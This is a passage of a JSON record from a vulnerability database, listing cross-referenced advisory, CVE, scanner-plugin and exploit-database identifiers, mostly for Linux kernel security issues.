"VIRTUOZZO_VZLSA-2017-1486.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105439", "OPENVAS:1361412562310120715", "OPENVAS:1361412562310122785", "OPENVAS:1361412562310123101", "OPENVAS:1361412562310123102", "OPENVAS:1361412562310123103", "OPENVAS:1361412562310123106", "OPENVAS:1361412562310123230", "OPENVAS:1361412562310123272", "OPENVAS:1361412562310123275", "OPENVAS:1361412562310123276", "OPENVAS:1361412562310123277", "OPENVAS:1361412562310123354", "OPENVAS:1361412562310123388", "OPENVAS:1361412562310123389", "OPENVAS:1361412562310123390", "OPENVAS:1361412562310123391", "OPENVAS:1361412562310123392", "OPENVAS:1361412562310123393", "OPENVAS:1361412562310123411", "OPENVAS:1361412562310131108", "OPENVAS:1361412562310131129", "OPENVAS:1361412562310131174", "OPENVAS:1361412562310140260", "OPENVAS:1361412562310702906", "OPENVAS:1361412562310702926", "OPENVAS:1361412562310702928", "OPENVAS:1361412562310703128", "OPENVAS:1361412562310703170", "OPENVAS:1361412562310703372", "OPENVAS:1361412562310703434", "OPENVAS:1361412562310703607", "OPENVAS:1361412562310703791", "OPENVAS:1361412562310703804", "OPENVAS:1361412562310703886", "OPENVAS:1361412562310804551", "OPENVAS:1361412562310807102", "OPENVAS:1361412562310807219", "OPENVAS:1361412562310808438", "OPENVAS:1361412562310808442", "OPENVAS:1361412562310808459", "OPENVAS:1361412562310811258", "OPENVAS:1361412562310841668", "OPENVAS:1361412562310841669", "OPENVAS:1361412562310841670", "OPENVAS:1361412562310841671", "OPENVAS:1361412562310841672", "OPENVAS:1361412562310841673", "OPENVAS:1361412562310841678", "OPENVAS:1361412562310841679", "OPENVAS:1361412562310841680", "OPENVAS:1361412562310841713", "OPENVAS:1361412562310841715", "OPENVAS:1361412562310841724", "OPENVAS:1361412562310841725", "OPENVAS:1361412562310841739", "OPENVAS:1361412562310841740", "OPENVAS:1361412562310841743", "OPENVAS:1361412562310841744", "OPENVAS:1361412562310841747", "OPENVAS:1361412562310841748", "OPENVAS:1361412562310841749", "OPENVAS:1361412562310841831", "OPENVAS:1361412562310841832", "OPENVAS:1361412562310841834", "OPENVAS:1361412562310841835", "OPENVAS:1361412562310841836", "OPENVAS:1361412562310841837", "OPENVAS:1361412562310841838", "OPENVAS:1361412562310841839", "OPENVAS:1361412562310841840", "OPENVAS:1361412562310841870", "OPENVAS:1361412562310841947", "OPENVAS:1361412562310841948", "OPENVAS:1361412562310841949", "OPENVAS:1361412562310841951", "OPENVAS:1361412562310841954", "OPENVAS:1361412562310841956", "OPENVAS:1361412562310841998", "OPENVAS:1361412562310841999", "OPENVAS:1361412562310842108", "OPENVAS:1361412562310842109", "OPENVAS:1361412562310842110", "OPENVAS:1361412562310842111", "OPENVAS:1361412562310842113", "OPENVAS:1361412562310842115", "OPENVAS:1361412562310842116", "OPENVAS:1361412562310842144", "OPENVAS:1361412562310842146", "OPENVAS:1361412562310842268", "OPENVAS:1361412562310842269", "OPENVAS:1361412562310842270", "OPENVAS:1361412562310842271", "OPENVAS:1361412562310842272", "OPENVAS:1361412562310842274", "OPENVAS:1361412562310842275", "OPENVAS:1361412562310842443", "OPENVAS:1361412562310842514", "OPENVAS:1361412562310842515", "OPENVAS:1361412562310842516", "OPENVAS:1361412562310842517", "OPENVAS:1361412562310842519", "OPENVAS:1361412562310842520", "OPENVAS:1361412562310842521", "OPENVAS:1361412562310842622", "OPENVAS:1361412562310842624", "OPENVAS:1361412562310842625", "OPENVAS:1361412562310842628", "OPENVAS:1361412562310842631", "OPENVAS:1361412562310842632", "OPENVAS:1361412562310842650", "OPENVAS:1361412562310842651", "OPENVAS:1361412562310842657", "OPENVAS:1361412562310842667", "OPENVAS:1361412562310842735", "OPENVAS:1361412562310842736", "OPENVAS:1361412562310842737", "OPENVAS:1361412562310842738", "OPENVAS:1361412562310842739", "OPENVAS:1361412562310842741", "OPENVAS:1361412562310842742", "OPENVAS:1361412562310842743", "OPENVAS:1361412562310842744", "OPENVAS:1361412562310842805", "OPENVAS:1361412562310842806", "OPENVAS:1361412562310842807", "OPENVAS:1361412562310842808", "OPENVAS:1361412562310842809", "OPENVAS:1361412562310842810", "OPENVAS:1361412562310842811", "OPENVAS:1361412562310842812", "OPENVAS:1361412562310842813", "OPENVAS:1361412562310842814", "OPENVAS:1361412562310842815", "OPENVAS:1361412562310842816", "OPENVAS:1361412562310842817", "OPENVAS:1361412562310842850", "OPENVAS:1361412562310842852", "OPENVAS:1361412562310842853", "OPENVAS:1361412562310842854", "OPENVAS:1361412562310842855", "OPENVAS:1361412562310842856", "OPENVAS:1361412562310842857", "OPENVAS:1361412562310842859", "OPENVAS:1361412562310842860", "OPENVAS:1361412562310843009", "OPENVAS:1361412562310843010", "OPENVAS:1361412562310843011", "OPENVAS:1361412562310843012", "OPENVAS:1361412562310843014", "OPENVAS:1361412562310843015", "OPENVAS:1361412562310843018", "OPENVAS:1361412562310843019", "OPENVAS:1361412562310843139", "OPENVAS:1361412562310843140", "OPENVAS:1361412562310843199", "OPENVAS:1361412562310843200", "OPENVAS:1361412562310843209", "OPENVAS:1361412562310843210", "OPENVAS:1361412562310843211", "OPENVAS:1361412562310843212", "OPENVAS:1361412562310843213", "OPENVAS:1361412562310843215", "OPENVAS:1361412562310843216", "OPENVAS:1361412562310843217", "OPENVAS:1361412562310843218", "OPENVAS:1361412562310843220", "OPENVAS:1361412562310843221", "OPENVAS:1361412562310843222", "OPENVAS:1361412562310843249", "OPENVAS:1361412562310843273", "OPENVAS:1361412562310843628", "OPENVAS:1361412562310843951", "OPENVAS:1361412562310843957", "OPENVAS:1361412562310844133", "OPENVAS:1361412562310844159", "OPENVAS:1361412562310850565", "OPENVAS:1361412562310850566", "OPENVAS:1361412562310850586", "OPENVAS:1361412562310850587", "OPENVAS:1361412562310850598", "OPENVAS:1361412562310850605", "OPENVAS:1361412562310850649", "OPENVAS:1361412562310850670", "OPENVAS:1361412562310850675", "OPENVAS:1361412562310850807", "OPENVAS:1361412562310850817", "OPENVAS:1361412562310850818", "OPENVAS:1361412562310850821", "OPENVAS:1361412562310850840", "OPENVAS:1361412562310850881", "OPENVAS:1361412562310850975", "OPENVAS:1361412562310850978", "OPENVAS:1361412562310851057", "OPENVAS:1361412562310851159", "OPENVAS:1361412562310851176", "OPENVAS:1361412562310851179", "OPENVAS:1361412562310851197", "OPENVAS:1361412562310851349", "OPENVAS:1361412562310851358", "OPENVAS:1361412562310851386", "OPENVAS:1361412562310851388", "OPENVAS:1361412562310851390", "OPENVAS:1361412562310851449", "OPENVAS:1361412562310851454", "OPENVAS:1361412562310851489", "OPENVAS:1361412562310851513", "OPENVAS:1361412562310851529", "OPENVAS:1361412562310851530", "OPENVAS:1361412562310851571", "OPENVAS:1361412562310851573", "OPENVAS:1361412562310867183", "OPENVAS:1361412562310867240", "OPENVAS:1361412562310867242", "OPENVAS:1361412562310867309", "OPENVAS:1361412562310867317", "OPENVAS:1361412562310867520", "OPENVAS:1361412562310867522", "OPENVAS:1361412562310867546", "OPENVAS:1361412562310867553", "OPENVAS:1361412562310867580", "OPENVAS:1361412562310867583", "OPENVAS:1361412562310867638", "OPENVAS:1361412562310867651", "OPENVAS:1361412562310867663", "OPENVAS:1361412562310867680", "OPENVAS:1361412562310867682", "OPENVAS:1361412562310867773", "OPENVAS:1361412562310867774", "OPENVAS:1361412562310867811", "OPENVAS:1361412562310867820", "OPENVAS:1361412562310867852", "OPENVAS:1361412562310867857", "OPENVAS:1361412562310867886", "OPENVAS:1361412562310867905", "OPENVAS:1361412562310867911", "OPENVAS:1361412562310867939", "OPENVAS:1361412562310867967", "OPENVAS:1361412562310867986", "OPENVAS:1361412562310868019", "OPENVAS:1361412562310868055", "OPENVAS:1361412562310868076", "OPENVAS:1361412562310868101", "OPENVAS:1361412562310868102", "OPENVAS:1361412562310868149", "OPENVAS:1361412562310868196", "OPENVAS:1361412562310868351", "OPENVAS:1361412562310868403", "OPENVAS:1361412562310868416", "OPENVAS:1361412562310868434", "OPENVAS:1361412562310868437", "OPENVAS:1361412562310868489", "OPENVAS:1361412562310868501", "OPENVAS:1361412562310868583", "OPENVAS:1361412562310868627", "OPENVAS:1361412562310868851", "OPENVAS:1361412562310868914", "OPENVAS:1361412562310868920", "OPENVAS:1361412562310868954", "OPENVAS:1361412562310868980", "OPENVAS:1361412562310868984", "OPENVAS:1361412562310869077", "OPENVAS:1361412562310869091", "OPENVAS:1361412562310869115", "OPENVAS:1361412562310869136", "OPENVAS:1361412562310869213", "OPENVAS:1361412562310869281", "OPENVAS:1361412562310869284", "OPENVAS:1361412562310869369", "OPENVAS:1361412562310869374", "OPENVAS:1361412562310869392", "OPENVAS:1361412562310869459", "OPENVAS:1361412562310869476", "OPENVAS:1361412562310869505", "OPENVAS:1361412562310869608", "OPENVAS:1361412562310869836", "OPENVAS:1361412562310869857", "OPENVAS:1361412562310869860", "OPENVAS:1361412562310869886", "OPENVAS:1361412562310869889", "OPENVAS:1361412562310871180", "OPENVAS:1361412562310871192", "OPENVAS:1361412562310871193", "OPENVAS:1361412562310871268", "OPENVAS:1361412562310871372", "OPENVAS:1361412562310871487", "OPENVAS:1361412562310871708", "OPENVAS:1361412562310871796", "OPENVAS:1361412562310871832", "OPENVAS:1361412562310871833", "OPENVAS:1361412562310872785", "OPENVAS:1361412562310872788", "OPENVAS:1361412562310873160", "OPENVAS:1361412562310881954", "OPENVAS:1361412562310881955", "OPENVAS:1361412562310882195", "OPENVAS:1361412562310882694", "OPENVAS:1361412562310882735", "OPENVAS:1361412562310882738", "OPENVAS:1361412562310890849", "OPENVAS:1361412562310890993", "OPENVAS:1361412562310891715", "OPENVAS:1361412562311220171071", "OPENVAS:1361412562311220171072", "OPENVAS:1361412562311220171154", "OPENVAS:1361412562311220171155", "OPENVAS:1361412562311220191475", "OPENVAS:1361412562311220191479", "OPENVAS:1361412562311220191480", "OPENVAS:1361412562311220191481", "OPENVAS:1361412562311220191483", "OPENVAS:1361412562311220191485", "OPENVAS:1361412562311220191488", "OPENVAS:1361412562311220191489", "OPENVAS:1361412562311220191494", "OPENVAS:1361412562311220191498", "OPENVAS:1361412562311220191535", "OPENVAS:1361412562311220192353", "OPENVAS:1361412562311220192599", "OPENVAS:702906", "OPENVAS:702926", "OPENVAS:702928", "OPENVAS:703128", "OPENVAS:703170", "OPENVAS:703372", "OPENVAS:703434", "OPENVAS:703607", "OPENVAS:703791", "OPENVAS:703804", "OPENVAS:703886", "OPENVAS:804551", "OPENVAS:841668", "OPENVAS:841669", "OPENVAS:841670", "OPENVAS:841671", "OPENVAS:841672", "OPENVAS:841673", "OPENVAS:841678", "OPENVAS:841679", "OPENVAS:841680", "OPENVAS:841713", "OPENVAS:841715", "OPENVAS:841724", "OPENVAS:841725", "OPENVAS:841739", "OPENVAS:841740", "OPENVAS:841743", "OPENVAS:841744", "OPENVAS:841747", "OPENVAS:841748", "OPENVAS:841749", "OPENVAS:850565", "OPENVAS:850566", "OPENVAS:867183", "OPENVAS:867240", "OPENVAS:867242", "OPENVAS:867309", "OPENVAS:867317", "OPENVAS:867520", "OPENVAS:867522", "OPENVAS:867546", "OPENVAS:867553", "OPENVAS:867580", "OPENVAS:867583", "OPENVAS:867638", "OPENVAS:867651", "OPENVAS:867663", "OPENVAS:867680", "OPENVAS:867682", "OPENVAS:867773", "OPENVAS:867774"]}, {"type": "oraclelinux", "idList": ["ELSA-2014-0740", "ELSA-2014-0740-1", "ELSA-2014-0771", "ELSA-2014-0786", "ELSA-2014-0981", "ELSA-2014-1392", "ELSA-2014-1971", "ELSA-2014-3034", "ELSA-2014-3041", "ELSA-2014-3042", "ELSA-2014-3043", "ELSA-2014-3081", "ELSA-2014-3082", "ELSA-2014-3083", "ELSA-2015-1081", "ELSA-2015-2152", "ELSA-2015-3041", "ELSA-2015-3042", "ELSA-2015-3043", "ELSA-2016-2574", "ELSA-2016-3644", "ELSA-2016-3645", "ELSA-2016-3646", "ELSA-2017-0933", "ELSA-2017-0933-1", "ELSA-2017-1482-1", "ELSA-2017-1484", "ELSA-2017-1484-1", "ELSA-2017-1486", "ELSA-2017-1615", "ELSA-2017-1615-1", "ELSA-2017-1723", "ELSA-2017-3508", "ELSA-2017-3509", "ELSA-2017-3510", "ELSA-2017-3516", "ELSA-2017-3533", "ELSA-2017-3534", "ELSA-2017-3535", "ELSA-2017-3566", "ELSA-2017-3567", "ELSA-2017-3582", "ELSA-2017-3583", "ELSA-2017-3587", "ELSA-2017-3592", "ELSA-2017-3595", "ELSA-2017-3609", "ELSA-2017-3640", "ELSA-2017-3651", "ELSA-2017-3658", "ELSA-2017-3659", "ELSA-2018-1854", "ELSA-2018-4021", "ELSA-2018-4164", "ELSA-2018-4172", "ELSA-2020-5912", "ELSA-2020-5926"]}, {"type": "osv", "idList": ["OSV:DLA-103-1", "OSV:DLA-1200-1", "OSV:DLA-155-1", "OSV:DLA-1715-1", "OSV:DLA-325-1", "OSV:DLA-378-1", "OSV:DLA-516-1", "OSV:DLA-772-1", "OSV:DLA-849-1", "OSV:DLA-993-1", "OSV:DSA-2906-1", "OSV:DSA-2926-1", "OSV:DSA-2928-1", "OSV:DSA-3128-1", "OSV:DSA-3170-1", "OSV:DSA-3372-1", "OSV:DSA-3434-1", "OSV:DSA-3607-1", "OSV:DSA-3791-1", "OSV:DSA-3804-1", "OSV:DSA-3886-1", "OSV:DSA-3886-2"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:136137", "PACKETSTORM:149804", "PACKETSTORM:152031"]}, {"type": "photon", "idList": ["PHSA-2016-0007", "PHSA-2017-0026", "PHSA-2017-0052", "PHSA-2018-0031"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:87BA757A5FD1FA33FB143A6AD7B02E98"]}, {"type": "redhat", "idList": ["RHSA-2014:0557", "RHSA-2014:0740", "RHSA-2014:0771", "RHSA-2014:0772", "RHSA-2014:0786", "RHSA-2014:0800", "RHSA-2014:0801", "RHSA-2014:0815", "RHSA-2014:0900", "RHSA-2014:1083", "RHSA-2014:1392", "RHSA-2014:1971", "RHSA-2015:1081", "RHSA-2015:2152", "RHSA-2015:2411", "RHSA-2016:2574", "RHSA-2016:2584", "RHSA-2017:0931", "RHSA-2017:0932", "RHSA-2017:0933", "RHSA-2017:1482", "RHSA-2017:1483", "RHSA-2017:1484", "RHSA-2017:1485", "RHSA-2017:1486", "RHSA-2017:1487", "RHSA-2017:1488", "RHSA-2017:1489", "RHSA-2017:1490", "RHSA-2017:1491", "RHSA-2017:1567", "RHSA-2017:1616", "RHSA-2017:1647", "RHSA-2017:1712"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-4578", "RH:CVE-2016-5243", "RH:CVE-2017-1000366", "RH:CVE-2017-2618", "RH:CVE-2017-6345", "RH:CVE-2018-14616"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30152", "SECURITYVULNS:DOC:30233", "SECURITYVULNS:DOC:30721", "SECURITYVULNS:DOC:30730", "SECURITYVULNS:DOC:30757", "SECURITYVULNS:DOC:31071", "SECURITYVULNS:DOC:31142", "SECURITYVULNS:DOC:31621", "SECURITYVULNS:DOC:31766", "SECURITYVULNS:DOC:32313", "SECURITYVULNS:DOC:32314", "SECURITYVULNS:VULN:13475", "SECURITYVULNS:VULN:13706", "SECURITYVULNS:VULN:13951", "SECURITYVULNS:VULN:13997", "SECURITYVULNS:VULN:14217", "SECURITYVULNS:VULN:14292"]}, {"type": "slackware", "idList": ["SSA-2017-177-01", "SSA-2017-180-01", "SSA-2017-184-01", "SSA-2019-030-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2014:0204-1", "OPENSUSE-SU-2014:0205-1", "OPENSUSE-SU-2014:0677-1", "OPENSUSE-SU-2014:0678-1", "OPENSUSE-SU-2014:0957-1", "OPENSUSE-SU-2014:0985-1", "OPENSUSE-SU-2015:0713-1", "OPENSUSE-SU-2015:0714-1", "OPENSUSE-SU-2015:1382-1", "OPENSUSE-SU-2016:0280-1", "OPENSUSE-SU-2016:0301-1", "OPENSUSE-SU-2016:0318-1", "OPENSUSE-SU-2016:1641-1", "OPENSUSE-SU-2016:2144-1", "OPENSUSE-SU-2016:2184-1", "OPENSUSE-SU-2016:2290-1", "OPENSUSE-SU-2016:2649-1", "OPENSUSE-SU-2016:3050-1", "OPENSUSE-SU-2016:3058-1", "OPENSUSE-SU-2016:3118-1", "OPENSUSE-SU-2017:0458-1", "OPENSUSE-SU-2017:0906-1", "OPENSUSE-SU-2017:0907-1", "OPENSUSE-SU-2017:1633-1", "OPENSUSE-SU-2017:1685-1", "SUSE-SU-2014:0667-1", "SUSE-SU-2014:0683-1", "SUSE-SU-2014:0696-1", "SUSE-SU-2014:0807-1", "SUSE-SU-2014:0908-1", "SUSE-SU-2014:0909-1", "SUSE-SU-2014:0910-1", "SUSE-SU-2014:0911-1", "SUSE-SU-2014:0912-1", "SUSE-SU-2014:1138-1", "SUSE-SU-2015:0529-1", "SUSE-SU-2015:0581-1", "SUSE-SU-2015:0736-1", "SUSE-SU-2015:0812-1", "SUSE-SU-2015:1224-1", "SUSE-SU-2015:1376-1", "SUSE-SU-2015:1478-1", "SUSE-SU-2015:1592-1", "SUSE-SU-2015:1611-1", "SUSE-SU-2016:0168-1", "SUSE-SU-2016:0585-1", "SUSE-SU-2016:0911-1", "SUSE-SU-2016:1102-1", "SUSE-SU-2016:1203-1", "SUSE-SU-2016:1672-1", "SUSE-SU-2016:1690-1", "SUSE-SU-2016:1937-1", "SUSE-SU-2016:1985-1", "SUSE-SU-2016:2074-1", "SUSE-SU-2016:2105-1", "SUSE-SU-2016:2245-1", "SUSE-SU-2016:3146-1", "SUSE-SU-2016:3188-1", "SUSE-SU-2016:3203-1", "SUSE-SU-2016:3217-1", "SUSE-SU-2016:3248-1", "SUSE-SU-2016:3252-1", "SUSE-SU-2017:0181-1", "SUSE-SU-2017:0226-1", "SUSE-SU-2017:0227-1", "SUSE-SU-2017:0228-1", "SUSE-SU-2017:0229-1", "SUSE-SU-2017:0230-1", "SUSE-SU-2017:0231-1", "SUSE-SU-2017:0233-1", "SUSE-SU-2017:0234-1", "SUSE-SU-2017:0235-1", "SUSE-SU-2017:0244-1", "SUSE-SU-2017:0245-1", "SUSE-SU-2017:0246-1", "SUSE-SU-2017:0247-1", "SUSE-SU-2017:0248-1", "SUSE-SU-2017:0249-1", "SUSE-SU-2017:0267-1", "SUSE-SU-2017:0268-1", "SUSE-SU-2017:0278-1", "SUSE-SU-2017:0293-1", "SUSE-SU-2017:0294-1", "SUSE-SU-2017:0333-1", "SUSE-SU-2017:0407-1", "SUSE-SU-2017:1102-1", "SUSE-SU-2017:1183-1", "SUSE-SU-2017:1247-1", "SUSE-SU-2017:1301-1", "SUSE-SU-2017:1360-1", "SUSE-SU-2017:1613-1", "SUSE-SU-2017:1615-1", "SUSE-SU-2017:1618-1", "SUSE-SU-2017:1628-1", "SUSE-SU-2017:1696-1", "SUSE-SU-2017:1704-1", "SUSE-SU-2017:1706-1", "SUSE-SU-2017:1707-1", "SUSE-SU-2017:1735-1", "SUSE-SU-2017:1903-1", "SUSE-SU-2017:1904-1", "SUSE-SU-2017:1905-1", "SUSE-SU-2017:1906-1", "SUSE-SU-2017:1907-1", "SUSE-SU-2017:1908-1", "SUSE-SU-2017:1909-1", "SUSE-SU-2017:1910-1", "SUSE-SU-2017:1912-1", "SUSE-SU-2017:1913-1", "SUSE-SU-2017:1914-1", "SUSE-SU-2017:1915-1", "SUSE-SU-2017:1922-1", "SUSE-SU-2017:1923-1", "SUSE-SU-2017:1924-1", "SUSE-SU-2017:1925-1", "SUSE-SU-2017:1937-1", "SUSE-SU-2017:1939-1", "SUSE-SU-2017:1941-1", "SUSE-SU-2017:1943-1", "SUSE-SU-2017:1944-1", "SUSE-SU-2017:1945-1", "SUSE-SU-2017:1946-1", "SUSE-SU-2017:1990-1", "SUSE-SU-2017:2342-1", "SUSE-SU-2017:2525-1"]}, {"type": "thn", "idList": ["THN:72D5C1EE790D99032F95F4A094E36BD6"]}, {"type": "threatpost", "idList": ["THREATPOST:EED8FDF6683A87D839082F0F1529E0D3"]}, {"type": "ubuntu", "idList": ["USN-2068-1", "USN-2069-1", "USN-2070-1", "USN-2071-1", "USN-2072-1", "USN-2073-1", "USN-2074-1", "USN-2075-1", "USN-2076-1", "USN-2109-1", "USN-2110-1", "USN-2113-1", "USN-2117-1", "USN-2128-1", "USN-2129-1", "USN-2135-1", "USN-2136-1", "USN-2138-1", "USN-2139-1", "USN-2141-1", "USN-2219-1", "USN-2220-1", "USN-2221-1", "USN-2223-1", "USN-2224-1", "USN-2225-1", "USN-2226-1", "USN-2227-1", "USN-2228-1", "USN-2260-1", "USN-2332-1", "USN-2333-1", "USN-2334-1", "USN-2335-1", "USN-2336-1", "USN-2337-1", "USN-2378-1", "USN-2379-1", "USN-2515-1", "USN-2515-2", "USN-2516-1", "USN-2516-2", "USN-2516-3", "USN-2517-1", "USN-2518-1", "USN-2541-1", "USN-2542-1", "USN-2660-1", "USN-2661-1", "USN-2662-1", "USN-2663-1", "USN-2664-1", "USN-2665-1", "USN-2666-1", "USN-2667-1", "USN-2792-1", "USN-2794-1", "USN-2795-1", "USN-2796-1", "USN-2797-1", "USN-2798-1", "USN-2799-1", "USN-2886-1", "USN-2886-2", "USN-2888-1", "USN-2890-1", "USN-2890-2", "USN-2890-3", "USN-2907-1", "USN-2907-2", "USN-2910-1", "USN-2910-2", "USN-2967-1", "USN-2967-2", "USN-2968-1", "USN-2968-2", "USN-2969-1", "USN-2970-1", "USN-2971-1", "USN-2971-2", "USN-2971-3", "USN-3016-1", "USN-3016-2", "USN-3016-3", "USN-3016-4", "USN-3017-1", "USN-3017-2", "USN-3017-3", "USN-3018-1", "USN-3018-2", "USN-3019-1", "USN-3020-1", "USN-3021-1", "USN-3021-2", "USN-3049-1", "USN-3050-1", "USN-3051-1", "USN-3052-1", "USN-3053-1", "USN-3054-1", "USN-3055-1", "USN-3056-1", "USN-3057-1", "USN-3167-1", "USN-3167-2", "USN-3168-1", "USN-3168-2", "USN-3169-1", "USN-3169-2", "USN-3169-3", "USN-3169-4", "USN-3265-1", "USN-3265-2", "USN-3312-1", "USN-3312-2", "USN-3324-1", "USN-3325-1", "USN-3326-1", "USN-3327-1", "USN-3328-1", "USN-3329-1", "USN-3330-1", "USN-3331-1", "USN-3332-1", "USN-3333-1", "USN-3334-1", "USN-3335-1", "USN-3335-2", "USN-3338-1", "USN-3338-2", "USN-3361-1", "USN-3381-1", "USN-3381-2", "USN-3754-1", "USN-3932-1", "USN-3932-2", "USN-4094-1", "USN-4118-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2013-4513", "UB:CVE-2013-4587", "UB:CVE-2014-1737", "UB:CVE-2014-3631", "UB:CVE-2014-4655", "UB:CVE-2014-9419", "UB:CVE-2015-1420", "UB:CVE-2015-5257", "UB:CVE-2015-7515", "UB:CVE-2015-8575", "UB:CVE-2015-8961", "UB:CVE-2016-4578", "UB:CVE-2016-5243", "UB:CVE-2016-7917", "UB:CVE-2016-9794", "UB:CVE-2017-1000364", "UB:CVE-2017-2618", "UB:CVE-2017-6345", "UB:CVE-2018-14616"]}, {"type": "veracode", "idList": ["VERACODE:15670"]}, {"type": "virtuozzo", "idList": ["VZA-2017-054", "VZA-2017-055", "VZA-2017-056", "VZA-2017-059", "VZA-2017-060", "VZA-2017-061"]}, {"type": "zdt", "idList": ["1337DAY-ID-23355", "1337DAY-ID-25865", "1337DAY-ID-32339"]}]}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "amazon", "idList": ["ALAS-2017-845"]}, {"type": "android", "idList": ["ANDROID:CVE-2015-8961", "ANDROID:CVE-2016-9794"]}, {"type": "androidsecurity", "idList": ["ANDROID:2016-08-01"]}, {"type": "archlinux", "idList": ["ASA-201706-28", "ASA-201706-31"]}, {"type": "centos", "idList": ["CESA-2017:0933", "CESA-2017:1484", "CESA-2017:1486"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:10916BBD941416F67134F1200DE97709", "CFOUNDRY:CAC337307F043175ACEEE3B0FD0416FF", "CFOUNDRY:DFAB11FD33D131C30AACDE9F4864FC0F", "CFOUNDRY:F8D3E57E228B2A2C80205C1B54F3649B"]}, {"type": "cve", "idList": ["CVE-2013-4513", "CVE-2013-4587", "CVE-2015-8575", "CVE-2015-8961", "CVE-2016-4578", "CVE-2016-5243", "CVE-2016-9794"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1200-1:A0B61", "DEBIAN:DLA-849-1:12807", "DEBIAN:DLA-993-1:71AF5", "DEBIAN:DLA-993-2:8276F", "DEBIAN:DSA-3791-1:AE0FD", "DEBIAN:DSA-3804-1:E7F94", "DEBIAN:DSA-3886-1:F6458", "DEBIAN:DSA-3886-2:AC7E4"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2013-4513", "DEBIANCVE:CVE-2013-4587", "DEBIANCVE:CVE-2014-1737", "DEBIANCVE:CVE-2014-3631", "DEBIANCVE:CVE-2014-4655", "DEBIANCVE:CVE-2014-9419", "DEBIANCVE:CVE-2015-1420", "DEBIANCVE:CVE-2015-5257", "DEBIANCVE:CVE-2015-7515", "DEBIANCVE:CVE-2015-8575", "DEBIANCVE:CVE-2015-8961", "DEBIANCVE:CVE-2016-4578", "DEBIANCVE:CVE-2016-5243", "DEBIANCVE:CVE-2016-5343", "DEBIANCVE:CVE-2016-7917", "DEBIANCVE:CVE-2016-9794", "DEBIANCVE:CVE-2017-1000364", "DEBIANCVE:CVE-2017-2618", "DEBIANCVE:CVE-2017-6345", "DEBIANCVE:CVE-2018-14616"]}, {"type": "exploitdb", "idList": ["EDB-ID:39544"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:1EC12227A84F918BB0C8C659BE0F2284"]}, {"type": "f5", "idList": ["F5:K31209433"]}, {"type": "fedora", "idList": ["FEDORA:2EB1060491B1", "FEDORA:3053760A9C97", "FEDORA:6435A6076A13", "FEDORA:ACCF760419AA", "FEDORA:EFDE7605A2A8"]}, {"type": "ibm", "idList": ["6B8D264C112CFCDDCE94E39A330DF7082557BFFF177349A0F825B791060643AF"]}, {"type": "kaspersky", "idList": ["KLA10480"]}, {"type": "lenovo", "idList": ["LENOVO:PS500144-NOSID"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/SOLARIS/LOCAL/RSH_STACK_CLASH_PRIV_ESC", "MSF:ILITIES/LINUXRPM-RHSA-2014-0740/"]}, {"type": "nessus", "idList": ["CENTOS_RHSA-2017-0933.NASL", "EULEROS_SA-2019-1485.NASL", "EULEROS_SA-2019-2353.NASL", "FEDORA_2016-3DAF782DFA.NASL", "FEDORA_2016-80EDB9D511.NASL", "FEDORA_2016-E0F3FCD7DF.NASL", "FIREEYE_OS_EX_801.NASL", "OPENSUSE-2015-301.NASL", "OPENSUSE-2016-1454.NASL", "ORACLELINUX_ELSA-2015-3043.NASL", "ORACLELINUX_ELSA-2017-0933-1.NASL", "ORACLELINUX_ELSA-2017-0933.NASL", "ORACLELINUX_ELSA-2017-3659.NASL", "ORACLEVM_OVMSA-2018-0015.NASL", "REDHAT-RHSA-2017-0931.NASL", "REDHAT-RHSA-2017-0932.NASL", "REDHAT-RHSA-2017-0933.NASL", "SL_20170412_KERNEL_ON_SL7_X.NASL", "SUSE_SU-2016-3146-1.NASL", "SUSE_SU-2016-3188-1.NASL", "SUSE_SU-2016-3203-1.NASL", "SUSE_SU-2016-3217-1.NASL", "SUSE_SU-2016-3248-1.NASL", "SUSE_SU-2016-3252-1.NASL", "SUSE_SU-2017-0244-1.NASL", "SUSE_SU-2017-0245-1.NASL", "SUSE_SU-2017-0246-1.NASL", "SUSE_SU-2017-0247-1.NASL", "SUSE_SU-2017-0248-1.NASL", "SUSE_SU-2017-0249-1.NASL", "SUSE_SU-2017-0267-1.NASL", "SUSE_SU-2017-0268-1.NASL", "UBUNTU_USN-3021-1.NASL", "UBUNTU_USN-3167-1.NASL", "UBUNTU_USN-3168-1.NASL", "UBUNTU_USN-3168-2.NASL", "UBUNTU_USN-3169-1.NASL", "UBUNTU_USN-3169-2.NASL", "UBUNTU_USN-3169-3.NASL", "UBUNTU_USN-3169-4.NASL", "UBUNTU_USN-3932-1.NASL", "UBUNTU_USN-3932-2.NASL", "UBUNTU_USN-4094-1.NASL", "UBUNTU_USN-4118-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310842108", "OPENVAS:1361412562310842271", "OPENVAS:1361412562310851454", "OPENVAS:1361412562310868102", "OPENVAS:1361412562310869476", "OPENVAS:1361412562310890993", "OPENVAS:1361412562311220191483", "OPENVAS:702928", "OPENVAS:841673"]}, {"type": "oraclelinux", "idList": ["ELSA-2014-0981", "ELSA-2017-0933", "ELSA-2017-0933-1", "ELSA-2018-4021"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:149804"]}, {"type": "photon", "idList": ["PHSA-2017-0026", "PHSA-2017-0052"]}, {"type": "redhat", "idList": ["RHSA-2016:2584", "RHSA-2017:0931", "RHSA-2017:0932"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-1000366", "RH:CVE-2017-2618", "RH:CVE-2017-6345"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13997"]}, {"type": "slackware", "idList": ["SSA-2017-177-01", "SSA-2017-180-01", "SSA-2017-184-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:3118-1", "SUSE-SU-2014:0912-1", "SUSE-SU-2015:1592-1", "SUSE-SU-2016:3146-1", "SUSE-SU-2016:3188-1", "SUSE-SU-2016:3203-1", "SUSE-SU-2016:3217-1", 